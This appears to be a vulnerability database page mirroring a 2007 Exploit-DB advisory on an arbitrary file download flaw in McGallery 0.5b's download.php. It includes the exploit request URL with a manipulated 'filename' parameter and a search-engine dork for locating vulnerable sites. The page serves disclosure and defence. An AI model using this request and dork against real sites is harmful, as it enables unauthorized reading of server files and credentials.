header-logo
Suggest Exploit
vendor:
McGallery
by:
Piker
8.5
CVSS
HIGH
Arbitrary File Download
22
CWE
Product Name: McGallery
Affected Version From: 0.5b
Affected Version To: 0.5b
Patch Exists: NO
Related CWE:
CPE: a:mcgallery:mcgallery:0.5b
Metasploit:
Other Scripts:
Platforms Tested:
2007

McGallery 0.5b Arbitrary File Download Vulnerability

The vulnerability allows an attacker to download arbitrary files from the target system by exploiting the 'download.php' script in McGallery 0.5b. By manipulating the 'filename' parameter, an attacker can specify any file to be downloaded, including sensitive system files.

Mitigation:

The vendor has not provided a specific mitigation for this vulnerability. It is recommended to update to a newer version of McGallery that addresses this issue.
Source

Exploit-DB raw data:

################## Piker #######################################
#
#
#    McGallery 0.5b Arbitrary File Download Vulnerability
#
#
#    Affected software: McGallery 0.5b
#    Vendor: http://sourceforge.net/projects/mcgallery/
#    Dork: allintitle: "MCgallery 0.5b"
#
################################################################
#
#    http://[target]/[path]/download.php?filename=main.php
#
################################################################
#
#                   Found by Piker
#                   The Am0s Team
#
#    Greetz: KX-T33, kakalake, nAzGuL, Putus, sn4ke
#
################################################################

# milw0rm.com [2007-03-15]

Navigation

Suggest Exploit

Services By CQR